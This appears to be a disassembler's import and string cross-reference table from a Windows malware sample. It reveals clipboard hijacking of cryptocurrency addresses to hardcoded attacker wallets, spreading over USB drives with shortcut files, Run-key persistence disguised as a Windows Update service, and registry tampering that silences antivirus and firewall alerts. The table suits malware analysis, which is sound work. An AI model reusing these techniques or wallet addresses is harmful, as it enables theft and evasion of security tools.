reference_vaddr	symbol_addr	symbol_type	caller_function	data
0x401000	0x40d054	import	0x401000	KERNEL32.dll.GetCurrentProcessId
0x401020	0x40d06c	import	0x401000	KERNEL32.dll.HeapAlloc
0x4010a8	0x40d054	import	0x401070	KERNEL32.dll.GetCurrentProcessId
0x4010de	0x40d068	import	0x401070	KERNEL32.dll.HeapFree
0x4010fb	0x40d054	import	0x401070	KERNEL32.dll.GetCurrentProcessId
0x40112d	0x40d068	import	0x401070	KERNEL32.dll.HeapFree
0x4011c6	0x40d054	import	0x401140	KERNEL32.dll.GetCurrentProcessId
0x4011fd	0x40d068	import	0x401140	KERNEL32.dll.HeapFree
0x4017da	0x4017e3	string	0x401790	v\n_^]
0x40189b	0x4018a3	string	0x401800	+ƉD$$ blocks=Basic Latin,Latin Extended-B
0x401955	0x401980	string	0x401800	VQUU
0x401973	0x401980	string	0x401800	VQUU
0x401976	0x401980	string	0x401800	VQUU
0x40197b	0x401980	string	0x401800	VQUU
0x401a54	0x401790	string	0x401800	SUVW
0x401a7f	0x401790	string	0x401800	SUVW
0x401ea4	0x401ee6	string	0x401e10	_^][
0x401f82	0x401fc6	string	0x401ef0	_^][
0x4020de	0x4020f1	string	0x4020d0	3\vT$
0x4020e2	0x4020f1	string	0x4020d0	3\vT$
0x40210a	0x40214a	string	0x4020d0	_^]YÍP blocks=Basic Latin,Latin-1 Supplement
0x402139	0x40214a	string	0x4020d0	_^]YÍP blocks=Basic Latin,Latin-1 Supplement
0x4021fd	0x40d068	import	0x402180	KERNEL32.dll.HeapFree
0x402226	0x40d054	import	0x402180	KERNEL32.dll.GetCurrentProcessId
0x402268	0x4022bb	string	0x402180	_^]3
0x402288	0x40d054	import	0x402180	KERNEL32.dll.GetCurrentProcessId
0x402294	0x4022bb	string	0x402180	_^]3
0x4022a1	0x4022bb	string	0x402180	_^]3
0x402315	0x402180	string	0x4022d0	SUVW
0x40231f	0x402382	string	0x4022d0	_^]3
0x402346	0x40d054	import	0x4022d0	KERNEL32.dll.GetCurrentProcessId
0x402352	0x402382	string	0x4022d0	_^]3
0x40235f	0x402382	string	0x4022d0	_^]3
0x40237c	0x40d068	import	0x4022d0	KERNEL32.dll.HeapFree
0x40250f	0x40d068	import	0x402390	KERNEL32.dll.HeapFree
0x402538	0x40d054	import	0x402390	KERNEL32.dll.GetCurrentProcessId
0x402598	0x40d054	import	0x402390	KERNEL32.dll.GetCurrentProcessId
0x4025d9	0x40262a	string	0x402390	_^]3
0x4025f6	0x40d054	import	0x402390	KERNEL32.dll.GetCurrentProcessId
0x402602	0x40262a	string	0x402390	_^]3
0x40260f	0x40262a	string	0x402390	_^]3
0x4026e6	0x402180	string	0x402640	SUVW
0x402a9d	0x40d068	import	0x402640	KERNEL32.dll.HeapFree
0x402aca	0x40d054	import	0x402640	KERNEL32.dll.GetCurrentProcessId
0x402b24	0x40d054	import	0x402640	KERNEL32.dll.GetCurrentProcessId
0x402b82	0x40d054	import	0x402640	KERNEL32.dll.GetCurrentProcessId
0x402bda	0x40d054	import	0x402640	KERNEL32.dll.GetCurrentProcessId
0x402c1d	0x402c93	string	0x402640	_^]3
0x402c4b	0x40d054	import	0x402640	KERNEL32.dll.GetCurrentProcessId
0x402c80	0x40d068	import	0x402640	KERNEL32.dll.HeapFree
0x402cb0	0x40d0e4	import	0x402ca0	KERNEL32.dll.lstrlenW
0x402cb6	0x40d168	import	0x402ca0	SHLWAPI.dll.StrStrW
0x402d79	0x402d8f	string	0x402ca0	_^]2
0x402d84	0x402d8f	string	0x402ca0	_^]2
0x402da2	0x402dad	string	0x402ca0	_^]2
0x402dcb	0x402dd6	string	0x402ca0	_^]2
0x402de0	0x40d32c	string	0x402ca0	bitcoincash:
0x402e00	0x40d348	string	0x402ca0	cosmos
0x402e20	0x40d358	string	0x402ca0	addr
0x402e5d	0x402d8f	string	0x402ca0	_^]2
0x402e63	0x40d32c	string	0x402ca0	bitcoincash:
0x402e75	0x40d2ac	import	0x402ca0	ntdll.dll.isalpha
0x402e7b	0x40d2a8	import	0x402ca0	ntdll.dll.isdigit
0x402e8f	0x402d8f	string	0x402ca0	_^]2
0x402e99	0x402d8f	string	0x402ca0	_^]2
0x402ea3	0x402d8f	string	0x402ca0	_^]2
0x402eb5	0x402ec9	string	0x402ca0	G;|$
0x402ec3	0x402d8f	string	0x402ca0	_^]2
0x402ee6	0x40d364	string	0x402ca0	13537267282679196401L
0x402eed	0x40d37c	string	0x402ca0	14T6qgnx6kQrxgr6asZR8UwvSYuLWUq3AHEUyArFbropQRWp
0x402ef7	0x40d3b0	string	0x402ca0	12ZcTiGZFWydqY4rDW6FbF1ArsBbdNaPxz
0x402f07	0x40d3d4	string	0x402ca0	3P99cyMypyaBthhNh1VLrtF7gjsHNxooth5
0x402f0e	0x40d3f8	string	0x402ca0	3NNJW9YnKichMXTVgAhrsD65veUBCfGC9m
0x402f19	0x40d41c	string	0x402ca0	qps3rmvkxc2qe0dxlffnxe6jvv90xtp8tcxquxva6v
0x402f24	0x40d448	string	0x402ca0	XkTJhYh432bGU2dMScEWmNLfyNTun3n52p
0x402f2f	0x40d46c	string	0x402ca0	DMfPdibKCp79N5sLqsLkqx7W7gyzS8dhK6
0x402f3a	0x40d490	string	0x402ca0	0xEa375AfbDa5e11af6F93932ef2dcDe2Cf38768Dd
0x402f45	0x40d4bc	string	0x402ca0	LhqqjWGpEEKDnZZVozMqYVax9zAzjQPJMW
0x402f50	0x40d4e0	string	0x402ca0	r3qS691ECDBqnCAa2Xq26HF55R38pyd2SU
0x402f5b	0x40d504	string	0x402ca0	TMumxbBnZn723FeqRnjZUbfvVvvmNaEyEY
0x402f70	0x40d54c	string	0x402ca0	tz1MQTA4y7zjDP8E3f7JxJpqA768QvhkQtwQ
0x402f7b	0x40d528	string	0x402ca0	t1J1JV7W2DgMbJCmzv3DKq69erCQ9sM7J8G
0x402f86	0x40d574	string	0x402ca0	hx76ca924ed3a86365aa684755d07ff587399a44a3
0x402f91	0x40d5a0	string	0x402ca0	QQyZHrgfAZUm6bqf19u3TZRfLU1szkWdAK
0x402f9c	0x40d5c4	string	0x402ca0	RWGY1zEN78ivFTZiMtiLLXYugjUM2Ezgdn
0x402fa7	0x40d5e8	string	0x402ca0	NDV3Q755N5RLBJIHD7O2MDQLHF7BGY7C5UFHJQJD
0x402fb2	0x40d614	string	0x402ca0	Aa6J2zX3FmXqZ1Vr6KB7SHEJeDQgZ9L1m9
0x402fbd	0x40d638	string	0x402ca0	SW7RcT7KzjDRZUeo33ULvuvgnk1vsfRu9h
0x402fcd	0x40d660	string	0x402ca0	zs1gdxkmsegruyeu72ehpfwgshmcup4sqxm7kafju9r7xjcfww8vlg7ar9rqraxmjhr9rdn2hj9v7w
0x402fd4	0x40d6b0	string	0x402ca0	zil1ks8wccts9uum532l6mt7zfn7v3grplu5plc7rd
0x402fdf	0x40d6dc	string	0x402ca0	s1QvSmGpRS7hxnjjfLvCkeDmy3MprJkpWBe
0x402fe4	0x40d168	import	0x402ca0	SHLWAPI.dll.StrStrW
0x402fea	0x40d700	string	0x402ca0	bitcoincash
0x402ff6	0x40d718	string	0x402ca0	bitcoincash:qps3rmvkxc2qe0dxlffnxe6jvv90xtp8tcxquxva6v
0x402ffb	0x40d348	string	0x402ca0	cosmos
0x403007	0x40d750	string	0x402ca0	cosmos18uv6asl0trdgeu0gajph8amh30qskjfeu7xsxf
0x403012	0x40d780	string	0x402ca0	46JBkCw1vWw2torA5cF6WwdPsjc4EziJE62PHWBKqkLmXVonQjSM5jk5zp1QfSjj2wPjzoLU64qGReNNouP2LLKBMJAZgbr
0x403017	0x40d358	string	0x402ca0	addr
0x403023	0x40d7e0	string	0x402ca0	addr1q82kgwmvcs3lcfaws5rq30cq94ek9nzqygcfj2a6045hpg8yjrm9xsu92x0lv30wldh80xqwtmxrc3jfetrzvnmstchq00s0sh
0x403031	0x40d848	string	0x402ca0	FWjKuczvp1fBH95y6c5j3koVX2TZDVR3V9
0x40303c	0x40d86c	string	0x402ca0	GB47TTMWVEURE5VW5NN56QFDW7X2OOSXKLL6KJIB4FQ3YMRUZXXE7P7W
0x403046	0x40d8a8	string	0x402ca0	GgY5yz2QmGk9jtk6WZ9dTYjt4oQumDpQS2
0x40305d	0x40d8d4	string	0x402ca0	bnb1ssq338y72jd2l0h53ujc8hn8ef9axa2d372gga
0x403062	0x40d900	string	0x402ca0	band
0x40306e	0x40d90c	string	0x402ca0	band17rdtnrylr8dlt88qpzqp8j588h5w2qnclf764u
0x40307f	0x40d940	string	0x402ca0	bc1q6rzlelsxd9xadajkjwqdwr72rl9ll7g29yxzqr
0x40308d	0x40d96c	string	0x402ca0	U30212907
0x403098	0x40d978	string	0x402ca0	E30940134
0x4030a3	0x40d984	string	0x402ca0	B30912949
0x4030a9	0x40d0c0	import	0x402ca0	KERNEL32.dll.lstrlenA
0x4030bc	0x40d0d0	import	0x402ca0	KERNEL32.dll.GlobalAlloc
0x4030c9	0x40d0c4	import	0x402ca0	KERNEL32.dll.GlobalLock
0x4030df	0x40d0e8	import	0x402ca0	KERNEL32.dll.GlobalUnlock
0x4030e7	0x40d1b4	import	0x402ca0	USER32.dll.OpenClipboard
0x4030f1	0x40d17c	import	0x402ca0	USER32.dll.EmptyClipboard
0x4030fa	0x40d1b8	import	0x402ca0	USER32.dll.SetClipboardData
0x403100	0x40d19c	import	0x402ca0	USER32.dll.CloseClipboard
0x40311f	0x40d0e4	import	0x403110	KERNEL32.dll.lstrlenW
0x403131	0x40d054	import	0x403110	KERNEL32.dll.GetCurrentProcessId
0x40315f	0x40d05c	import	0x403110	KERNEL32.dll.GetProcessHeaps
0x403187	0x40d064	import	0x403110	KERNEL32.dll.HeapCreate
0x4031a8	0x40d058	import	0x403110	KERNEL32.dll.HeapSetInformation
0x4031e0	0x40d06c	import	0x403110	KERNEL32.dll.HeapAlloc
0x40321b	0x40d0d8	import	0x403110	KERNEL32.dll.lstrcpynW
0x403253	0x40d0c0	import	0x403240	KERNEL32.dll.lstrlenA
0x40326f	0x40d0e0	import	0x403240	KERNEL32.dll.MultiByteToWideChar
0x40327f	0x40d054	import	0x403240	KERNEL32.dll.GetCurrentProcessId
0x4032ad	0x40d05c	import	0x403240	KERNEL32.dll.GetProcessHeaps
0x4032cf	0x40d054	import	0x403240	KERNEL32.dll.GetCurrentProcessId
0x4032db	0x40d064	import	0x403240	KERNEL32.dll.HeapCreate
0x4032fc	0x40d058	import	0x403240	KERNEL32.dll.HeapSetInformation
0x403334	0x40d06c	import	0x403240	KERNEL32.dll.HeapAlloc
0x403377	0x40d0e0	import	0x403240	KERNEL32.dll.MultiByteToWideChar
0x4033a0	0x40d054	import	0x403240	KERNEL32.dll.GetCurrentProcessId
0x4033ac	0x4033dc	string	0x403240	[_^3
0x4033b9	0x4033dc	string	0x403240	[_^3
0x4033d6	0x40d068	import	0x403240	KERNEL32.dll.HeapFree
0x403603	0x40d0c8	import	0x4035d0	KERNEL32.dll.GetModuleHandleW
0x403609	0x40d0d4	import	0x4035d0	KERNEL32.dll.Sleep
0x40360f	0x40d190	import	0x4035d0	USER32.dll.wsprintfW
0x403615	0x40d0cc	import	0x4035d0	KERNEL32.dll.GetTickCount
0x40361b	0x40d170	import	0x4035d0	USER32.dll.RegisterClassExW
0x403640	0x40d990	string	0x4035d0	%x%X
0x403675	0x40d1ac	import	0x4035d0	USER32.dll.CreateWindowExW
0x40367f	0x40d1a0	import	0x4035d0	USER32.dll.GetMessageA
0x403696	0x40d178	import	0x4035d0	USER32.dll.TranslateMessage
0x40369c	0x40d1b0	import	0x4035d0	USER32.dll.DispatchMessageA
0x4036c3	0x40d0dc	import	0x4035d0	KERNEL32.dll.ExitThread
0x4036f4	0x40377f	string	0x4036d0	_^]2
0x40379a	0x40d0fc	import	0x403790	KERNEL32.dll.InitializeCriticalSection
0x4037b4	0x40d104	import	0x403790	KERNEL32.dll.CreateFileW
0x4037c3	0x40385c	string	0x403790	_^][Y
0x4037d4	0x40d110	import	0x403790	KERNEL32.dll.CreateFileMappingW
0x4037e9	0x40d0f0	import	0x403790	KERNEL32.dll.MapViewOfFile
0x4037f8	0x40d0ec	import	0x403790	KERNEL32.dll.GetFileSize
0x403844	0x40d0f4	import	0x403790	KERNEL32.dll.UnmapViewOfFile
0x40384f	0x40d114	import	0x403790	KERNEL32.dll.CloseHandle
0x403856	0x40d114	import	0x403790	KERNEL32.dll.CloseHandle
0x403889	0x40d10c	import	0x403870	KERNEL32.dll.EnterCriticalSection
0x4038d3	0x40d100	import	0x403870	KERNEL32.dll.LeaveCriticalSection
0x4038eb	0x40d10c	import	0x4038e0	KERNEL32.dll.EnterCriticalSection
0x40392d	0x403920	string	0x4038e0	91t\r@
0x403953	0x40d054	import	0x4038e0	KERNEL32.dll.GetCurrentProcessId
0x403989	0x40d068	import	0x4038e0	KERNEL32.dll.HeapFree
0x403994	0x40d100	import	0x4038e0	KERNEL32.dll.LeaveCriticalSection
0x4039a6	0x40d22c	import	0x4038e0	WS2_32.dll.inet_ntoa
0x4039b1	0x40d100	import	0x4038e0	KERNEL32.dll.LeaveCriticalSection
0x4039c9	0x40d10c	import	0x4039c0	KERNEL32.dll.EnterCriticalSection
0x4039fc	0x4039f0	string	0x4039c0	98t\eF
0x403a04	0x40d100	import	0x4039c0	KERNEL32.dll.LeaveCriticalSection
0x403a4d	0x40d100	import	0x4039c0	KERNEL32.dll.LeaveCriticalSection
0x403a75	0x40d10c	import	0x403a60	KERNEL32.dll.EnterCriticalSection
0x403afe	0x40d054	import	0x403a60	KERNEL32.dll.GetCurrentProcessId
0x403b30	0x40d068	import	0x403a60	KERNEL32.dll.HeapFree
0x403b55	0x40d104	import	0x403a60	KERNEL32.dll.CreateFileW
0x403b70	0x40d0f8	import	0x403a60	KERNEL32.dll.WriteFile
0x403ba7	0x40d108	import	0x403a60	KERNEL32.dll.FlushFileBuffers
0x403bae	0x40d114	import	0x403a60	KERNEL32.dll.CloseHandle
0x403bb9	0x40d054	import	0x403a60	KERNEL32.dll.GetCurrentProcessId
0x403c03	0x40d068	import	0x403a60	KERNEL32.dll.HeapFree
0x403c63	0x40d068	import	0x403a60	KERNEL32.dll.HeapFree
0x403cb2	0x40d22c	import	0x403a60	WS2_32.dll.inet_ntoa
0x403cbd	0x40d100	import	0x403a60	KERNEL32.dll.LeaveCriticalSection
0x403cf7	0x40d11c	import	0x403cd0	KERNEL32.dll.GetDriveTypeW
0x403d1d	0x40d0b8	import	0x403cd0	KERNEL32.dll.QueryDosDeviceW
0x403d33	0x40d150	import	0x403cd0	SHLWAPI.dll.StrCmpNW
0x403d53	0x40d0a4	import	0x403cd0	KERNEL32.dll.lstrcpyW
0x403d76	0x40d128	import	0x403d70	KERNEL32.dll.GetLogicalDrives
0x403d7c	0x40d020	import	0x403d70	ADVAPI32.dll.RegOpenKeyExW
0x403d82	0x40d010	import	0x403d70	ADVAPI32.dll.RegQueryValueExW
0x403db6	0x40d9b0	string	0x403d70	Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
0x403dd8	0x40da28	string	0x403d70	NoDrives
0x403dfd	0x40d01c	import	0x403d70	ADVAPI32.dll.RegCloseKey
0x403e2f	0x40da3c	string	0x403e20	%s\VolDriver.exe
0x403e35	0x40d190	import	0x403e20	USER32.dll.wsprintfW
0x403e40	0x40d2b4	import	0x403e20	ole32.dll.CoInitialize
0x403e58	0x40d2c0	import	0x403e20	ole32.dll.CoCreateInstance
0x403e73	0x40da60	string	0x403e20	%windir%\explorer.exe
0x403e8b	0x40dae8	string	0x403e20	shell32.dll
0x403f24	0x40d124	import	0x403f10	KERNEL32.dll.CreateDirectoryW
0x403f31	0x40d190	import	0x403f10	USER32.dll.wsprintfW
0x403f3f	0x40da8c	string	0x403f10	%s\*
0x403f57	0x40d118	import	0x403f10	KERNEL32.dll.FindFirstFileW
0x403f64	0x404020	string	0x403f10	_^][
0x403f6a	0x40d134	import	0x403f10	KERNEL32.dll.lstrcmpW
0x403f9d	0x40daa4	string	0x403f10	%s\%s
0x403fb2	0x40daa4	string	0x403f10	%s\%s
0x403ff0	0x40d120	import	0x403f10	KERNEL32.dll.MoveFileExW
0x404000	0x40d0b0	import	0x403f10	KERNEL32.dll.FindNextFileW
0x404013	0x40d138	import	0x403f10	KERNEL32.dll.FindClose
0x40401a	0x40d0bc	import	0x403f10	KERNEL32.dll.RemoveDirectoryW
0x40404b	0x40d190	import	0x404030	USER32.dll.wsprintfW
0x40405a	0x40dab0	string	0x404030	%s.lnk
0x404072	0x40daa4	string	0x404030	%s\%s
0x404087	0x40dac0	string	0x404030	%s\%s\VolDriver.exe
0x40409f	0x40daa4	string	0x404030	%s\%s
0x4040af	0x40da8c	string	0x404030	%s\*
0x4040b7	0x40d14c	import	0x404030	SHLWAPI.dll.PathFileExistsW
0x4040ca	0x40d0d4	import	0x404030	KERNEL32.dll.Sleep
0x4040eb	0x40d124	import	0x404030	KERNEL32.dll.CreateDirectoryW
0x4040ff	0x40d0a0	import	0x404030	KERNEL32.dll.SetFileAttributesW
0x404129	0x40d12c	import	0x404030	KERNEL32.dll.CopyFileW
0x40413d	0x40d0a0	import	0x404030	KERNEL32.dll.SetFileAttributesW
0x404189	0x40d0a0	import	0x404030	KERNEL32.dll.SetFileAttributesW
0x40419c	0x40d118	import	0x404030	KERNEL32.dll.FindFirstFileW
0x4041a9	0x4043b4	string	0x404030	_^]2
0x4041af	0x40d0a8	import	0x404030	KERNEL32.dll.DeleteFileW
0x4041bc	0x40db00	string	0x404030	*.lnk
0x4041c4	0x40db0c	string	0x404030	*.vbs
0x4041cc	0x40db18	string	0x404030	*.js
0x4041d4	0x40db24	string	0x404030	*.inf*.scr
0x4041dc	0x40db3c	string	0x404030	*.com
0x4041e4	0x40db48	string	0x404030	*.jse
0x4041ec	0x40db54	string	0x404030	*.cmd
0x4041f4	0x40db60	string	0x404030	*.pif
0x4041fc	0x40db6c	string	0x404030	*.jar
0x404204	0x40db78	string	0x404030	*.dll
0x40420c	0x40db84	string	0x404030	*.vbe
0x404214	0x40db90	string	0x404030	*.bat
0x404228	0x40db9c	string	0x404030	Thumbs.db
0x404230	0x40dbb0	string	0x404030	$RECYCLE.BIN
0x404238	0x40dbcc	string	0x404030	desktop.ini
0x404240	0x40dbe4	string	0x404030	System Volume Information
0x404250	0x40d134	import	0x404030	KERNEL32.dll.lstrcmpW
0x40429d	0x40d0b4	import	0x404030	KERNEL32.dll.lstrcmpiW
0x4042c0	0x40d154	import	0x404030	SHLWAPI.dll.PathMatchSpecW
0x4042d8	0x40d14c	import	0x404030	SHLWAPI.dll.PathFileExistsW
0x4042f6	0x40daa4	string	0x404030	%s\%s
0x404313	0x40dc18	string	0x404030	%s\%s\%s
0x40434f	0x40daa4	string	0x404030	%s\%s
0x404367	0x40d0a0	import	0x404030	KERNEL32.dll.SetFileAttributesW
0x40438b	0x40d120	import	0x404030	KERNEL32.dll.MoveFileExW
0x40439b	0x40d0b0	import	0x404030	KERNEL32.dll.FindNextFileW
0x4043ae	0x40d138	import	0x404030	KERNEL32.dll.FindClose
0x4043e5	0x40d0d4	import	0x4043d0	KERNEL32.dll.Sleep
0x4043f7	0x40d130	import	0x4043d0	KERNEL32.dll.GetModuleFileNameW
0x4043fd	0x40d028	import	0x4043d0	KERNEL32.dll.GetVolumeInformationW
0x404403	0x40d190	import	0x4043d0	USER32.dll.wsprintfW
0x404480	0x40d0ac	import	0x4043d0	KERNEL32.dll.GetDiskFreeSpaceExW
0x40449e	0x40dc2c	string	0x4043d0	(%dGB)
0x4044b5	0x40dc3c	string	0x4043d0	Unnamed volume
0x4044d4	0x40dc5c	string	0x4043d0	%s%s
0x404517	0x40d0d4	import	0x4043d0	KERNEL32.dll.Sleep
0x404584	0x4072e0	string	0x404530	QSUV
0x40458e	0x40d054	import	0x404530	KERNEL32.dll.GetCurrentProcessId
0x4045c4	0x40d068	import	0x404530	KERNEL32.dll.HeapFree
0x40461f	0x40d054	import	0x4045e0	KERNEL32.dll.GetCurrentProcessId
0x404655	0x40d068	import	0x4045e0	KERNEL32.dll.HeapFree
0x40466e	0x4046a6	string	0x404660	_^][
0x404677	0x4038e0	string	0x404660	SUVWh
0x4046d7	0x4038e0	string	0x4046b0	SUVWh
0x404749	0x4072e0	string	0x4046b0	QSUV
0x404769	0x40d2c0	import	0x404760	ole32.dll.CoCreateInstance
0x40479f	0x4047a9	string	0x404760	3\tD$
0x4048d0	0x4048da	string	0x404760	3\tD$
0x4048e4	0x40dc68	string	0x404760	Microsoft Corporation
0x4048e9	0x40d144	import	0x404760	OLEAUT32.dll.SysReAllocString
0x40493a	0x40d140	import	0x404760	OLEAUT32.dll.SysStringLen
0x4049c5	0x40d2a4	import	0x4049a0	ntdll.dll.strstr
0x4049d9	0x40d054	import	0x4049a0	KERNEL32.dll.GetCurrentProcessId
0x404a0f	0x40d068	import	0x4049a0	KERNEL32.dll.HeapFree
0x404a2e	0x40d0d4	import	0x404a20	KERNEL32.dll.Sleep
0x404a49	0x40d130	import	0x404a20	KERNEL32.dll.GetModuleFileNameW
0x404a63	0x40dce4	string	0x404a20	winupscvs.exe
0x404a73	0x40dd00	string	0x404a20	Microsoft Windows Update Service
0x404a8d	0x40d07c	import	0x404a20	KERNEL32.dll.CreateMutexA
0x404a93	0x40d080	import	0x404a20	KERNEL32.dll.GetLastError
0x404aa2	0x40d088	import	0x404a20	KERNEL32.dll.ExitProcess
0x404abd	0x40d158	import	0x404a20	SHLWAPI.dll.PathFindFileNameW
0x404ac3	0x40d190	import	0x404a20	USER32.dll.wsprintfW
0x404ad7	0x40dd44	string	0x404a20	%s:Zone.Identifier
0x404aea	0x40d0a8	import	0x404a20	KERNEL32.dll.DeleteFileW
0x404af0	0x40dd6c	string	0x404a20	winupsvc.exe
0x404b22	0x40d01c	import	0x404a20	ADVAPI32.dll.RegCloseKey
0x404b3d	0x40dd88	string	0x404a20	%userprofile%
0x404b42	0x40d074	import	0x404a20	KERNEL32.dll.ExpandEnvironmentStringsW
0x404b5c	0x40daa4	string	0x404a20	%s\%s
0x404b76	0x40d12c	import	0x404a20	KERNEL32.dll.CopyFileW
0x404b8a	0x40d0a0	import	0x404a20	KERNEL32.dll.SetFileAttributesW
0x404b9c	0x40dda8	string	0x404a20	Software\Microsoft\Windows\CurrentVersion\Run\
0x404ba6	0x40d020	import	0x404a20	ADVAPI32.dll.RegOpenKeyExW
0x404bea	0x40d000	import	0x404a20	ADVAPI32.dll.RegSetValueExW
0x404bfe	0x40d014	import	0x404a20	ADVAPI32.dll.RegOpenKeyExA
0x404c10	0x40de08	string	0x404a20	SOFTWARE\Microsoft\Security Center
0x404c1c	0x40d018	import	0x404a20	ADVAPI32.dll.RegSetValueExA
0x404c39	0x40de2c	string	0x404a20	FirewallOverride
0x404c50	0x40de40	string	0x404a20	FirewallDisableNotify
0x404c67	0x40de58	string	0x404a20	AntiSpywareOverride
0x404c7e	0x40de6c	string	0x404a20	AntiVirusOverride
0x404c95	0x40de80	string	0x404a20	AntiVirusDisableNotify
0x404cac	0x40de98	string	0x404a20	UpdatesOverride
0x404cc3	0x40dea8	string	0x404a20	UpdatesDisableNotify
0x404cde	0x40dec0	string	0x404a20	SOFTWARE\Microsoft\Security Center\Svc
0x404d00	0x40de2c	string	0x404a20	FirewallOverride
0x404d17	0x40de40	string	0x404a20	FirewallDisableNotify
0x404d2e	0x40de58	string	0x404a20	AntiSpywareOverride
0x404d45	0x40de6c	string	0x404a20	AntiVirusOverride
0x404d5c	0x40de80	string	0x404a20	AntiVirusDisableNotify
0x404d73	0x40de98	string	0x404a20	UpdatesOverride
0x404d8a	0x40dea8	string	0x404a20	UpdatesDisableNotify
0x404dde	0x40d20c	import	0x404a20	WS2_32.dll.WSAStartup
0x404df1	0x40dd88	string	0x404a20	%userprofile%
0x404df6	0x40d074	import	0x404a20	KERNEL32.dll.ExpandEnvironmentStringsW
0x404dfc	0x40d190	import	0x404a20	USER32.dll.wsprintfW
0x404e0a	0x40dee8	string	0x404a20	%s\nodescfg.dat
0x404e21	0x40df08	string	0x404a20	%s\cmdcfg.dat
0x404e2d	0x40d078	import	0x404a20	KERNEL32.dll.CreateThread
0x404e66	0x403790	string	0x404a20	QSUVWh
0x404e74	0x40d2bc	import	0x404a20	ole32.dll.CoInitializeEx
0x404e7f	0x40d144	import	0x404a20	OLEAUT32.dll.SysReAllocString
0x404e95	0x40d140	import	0x404a20	OLEAUT32.dll.SysStringLen
0x404e9b	0x40d2b8	import	0x404a20	ole32.dll.CoUninitialize
0x404ea9	0x40d084	import	0x404a20	KERNEL32.dll.CreateEventA
0x404f48	0x4056fd	string	0x404f30	_^][
0x405aff	0x405b9b	string	0x405af0	_^][Ã blocks=Basic Latin,Latin-1 Supplement
0x405b0b	0x405b9b	string	0x405af0	_^][Ã blocks=Basic Latin,Latin-1 Supplement
0x405bf0	0x405cd9	string	0x405ba0	]^_[
0x406193	0x406248	string	0x406010	_^][
0x40621e	0x406248	string	0x406010	_^][
0x40642f	0x406472	string	0x4063c0	_^]Y
0x406482	0x40d054	import	0x406480	KERNEL32.dll.GetCurrentProcessId
0x4064a5	0x40d06c	import	0x406480	KERNEL32.dll.HeapAlloc
0x40653e	0x40d068	import	0x406480	KERNEL32.dll.HeapFree
0x40658d	0x40d060	import	0x406550	KERNEL32.dll.HeapValidate
0x4065fa	0x40d05c	import	0x4065e0	KERNEL32.dll.GetProcessHeaps
0x406642	0x40d054	import	0x406640	KERNEL32.dll.GetCurrentProcessId
0x406661	0x40d064	import	0x406640	KERNEL32.dll.HeapCreate
0x406682	0x40d058	import	0x406640	KERNEL32.dll.HeapSetInformation
0x4066a7	0x40d054	import	0x4066a0	KERNEL32.dll.GetCurrentProcessId
0x4066e5	0x40d06c	import	0x4066a0	KERNEL32.dll.HeapAlloc
0x406713	0x40d054	import	0x406710	KERNEL32.dll.GetCurrentProcessId
0x406753	0x40d06c	import	0x406710	KERNEL32.dll.HeapAlloc
0x40679a	0x40d054	import	0x406790	KERNEL32.dll.GetCurrentProcessId
0x406810	0x40d070	import	0x406790	KERNEL32.dll.HeapReAlloc
0x40681c	0x40d054	import	0x406790	KERNEL32.dll.GetCurrentProcessId
0x406851	0x40d068	import	0x406790	KERNEL32.dll.HeapFree
0x406868	0x40d06c	import	0x406790	KERNEL32.dll.HeapAlloc
0x4068a0	0x40d054	import	0x4068a0	KERNEL32.dll.GetCurrentProcessId
0x4068d6	0x40d068	import	0x4068a0	KERNEL32.dll.HeapFree
0x40696d	0x40d068	import	0x406960	KERNEL32.dll.HeapFree
0x406988	0x40d054	import	0x406960	KERNEL32.dll.GetCurrentProcessId
0x406994	0x4069bc	string	0x406960	G;|$
0x4069a1	0x4069bc	string	0x406960	G;|$
0x4069c3	0x40d054	import	0x406960	KERNEL32.dll.GetCurrentProcessId
0x4069cf	0x4069fb	string	0x406960	_^][Ë blocks=Basic Latin,Latin-1 Supplement
0x4069e0	0x4069fb	string	0x406960	_^][Ë blocks=Basic Latin,Latin-1 Supplement
0x406ac7	0x40d234	import	0x406aa0	WS2_32.dll.htons
0x406ad7	0x40d230	import	0x406aa0	WS2_32.dll.inet_addr
0x406ae9	0x40d248	import	0x406aa0	WS2_32.dll.gethostbyname
0x406b04	0x40d240	import	0x406aa0	WS2_32.dll.socket
0x406b19	0x40d228	import	0x406aa0	WS2_32.dll.connect
0x406b4e	0x40d238	import	0x406aa0	WS2_32.dll.getsockname
0x406b5b	0x40d23c	import	0x406aa0	WS2_32.dll.shutdown
0x406b62	0x40d244	import	0x406aa0	WS2_32.dll.closesocket
0x406b76	0x40d04c	import	0x406aa0	KERNEL32.dll.WaitForSingleObject
0x406b8c	0x40d100	import	0x406aa0	KERNEL32.dll.LeaveCriticalSection
0x406b93	0x40d050	import	0x406aa0	KERNEL32.dll.InterlockedDecrement
0x406b9a	0x40d10c	import	0x406aa0	KERNEL32.dll.EnterCriticalSection
0x406c00	0x406cbc	string	0x406be0	^[YÁ blocks=Basic Latin,Latin-1 Supplement
0x406c47	0x40d104	import	0x406be0	KERNEL32.dll.CreateFileW
0x406c5e	0x40d0f8	import	0x406be0	KERNEL32.dll.WriteFile
0x406c65	0x40d108	import	0x406be0	KERNEL32.dll.FlushFileBuffers
0x406c6c	0x40d114	import	0x406be0	KERNEL32.dll.CloseHandle
0x406c79	0x40d048	import	0x406be0	KERNEL32.dll.InterlockedExchange
0x406c7f	0x40d054	import	0x406be0	KERNEL32.dll.GetCurrentProcessId
0x406c8c	0x406cbc	string	0x406be0	^[YÁ blocks=Basic Latin,Latin-1 Supplement
0x406c99	0x406cbc	string	0x406be0	^[YÁ blocks=Basic Latin,Latin-1 Supplement
0x406cb6	0x40d068	import	0x406be0	KERNEL32.dll.HeapFree
0x406cd3	0x40d224	import	0x406cc0	WS2_32.dll.gethostname
0x406ce3	0x40d248	import	0x406cc0	WS2_32.dll.gethostbyname
0x406d2e	0x40d10c	import	0x406d20	KERNEL32.dll.EnterCriticalSection
0x406d47	0x40d29c	import	0x406d20	ntdll.dll.NtQuerySystemTime
0x406d76	0x40d290	import	0x406d20	ntdll.dll.RtlTimeToSecondsSince1980
0x406dac	0x40d100	import	0x406d20	KERNEL32.dll.LeaveCriticalSection
0x406dd8	0x40d10c	import	0x406dc0	KERNEL32.dll.EnterCriticalSection
0x406e06	0x40d100	import	0x406dc0	KERNEL32.dll.LeaveCriticalSection
0x406e18	0x40d100	import	0x406dc0	KERNEL32.dll.LeaveCriticalSection
0x406ea2	0x4070a9	string	0x406e90	_^][
0x406ead	0x40d10c	import	0x406e90	KERNEL32.dll.EnterCriticalSection
0x406eb9	0x40d29c	import	0x406e90	ntdll.dll.NtQuerySystemTime
